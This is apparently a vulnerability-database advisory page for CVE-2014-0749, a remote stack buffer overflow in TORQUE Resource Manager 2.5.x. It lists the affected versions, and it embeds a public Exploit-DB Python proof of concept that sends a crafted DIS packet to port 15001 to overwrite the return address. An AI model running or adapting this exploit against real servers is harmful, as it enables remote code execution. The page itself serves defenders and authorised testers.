CVE-2014-0749

critical

Published 2014-05-16 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Stack-based buffer overflow in lib/Libdis/disrsi_.c in Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 2.5.x through 2.5.13 allows remote attackers to execute arbitrary code via a large count value.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33554 remote linux python · 1 KB

bwall · 2014-05-28

TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub

python exploit Source: Exploit-DB

#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
# Date: 27 May 2014
# Exploit Author: bwall - @botnet_hunter
# Vulnerability discovered by: MWR Labs
# CVE: CVE-2014-0749
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version: 2.5.13
# Tested on: Manjaro x64
# Description:
# A buffer overflow while parsing the DIS network communication protocol.  It is triggered when requesting that
# a larger amount of data than the small buffer be read.  The first digit supplied is the number of digits in the
# data, the next digits are the actual size of the buffer.
#
# This is an exploit stub, meant to be a quick proof of concept.  This was built and tested for a 64 bit system
# with ASLR disabled.  Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
# compiled on the target system.  The result of this exploit is intended to just point RIP at 'exit()'

import socket


ip = "172.16.246.177"
port = 15001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))

offset = 143
header = str(len(str(offset))) + str(offset) + '1'

packet = header
packet += "\x00" * (140 - len(packet))
packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build

s.sendall(packet)
data = s.recv(1024)
s.close()

Application impact

Vendor	Product	Versions
adaptivecomputing	torque_resource_manager	`2.5.0`
adaptivecomputing	torque_resource_manager	`2.5.1`
adaptivecomputing	torque_resource_manager	`2.5.2`
adaptivecomputing	torque_resource_manager	`2.5.3`
adaptivecomputing	torque_resource_manager	`2.5.4`
adaptivecomputing	torque_resource_manager	`2.5.5`
adaptivecomputing	torque_resource_manager	`2.5.6`
adaptivecomputing	torque_resource_manager	`2.5.7`
adaptivecomputing	torque_resource_manager	`2.5.8`
adaptivecomputing	torque_resource_manager	`2.5.9`
adaptivecomputing	torque_resource_manager	`2.5.10`
adaptivecomputing	torque_resource_manager	`2.5.11`
adaptivecomputing	torque_resource_manager	`2.5.12`
adaptivecomputing	torque_resource_manager	`2.5.13`

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.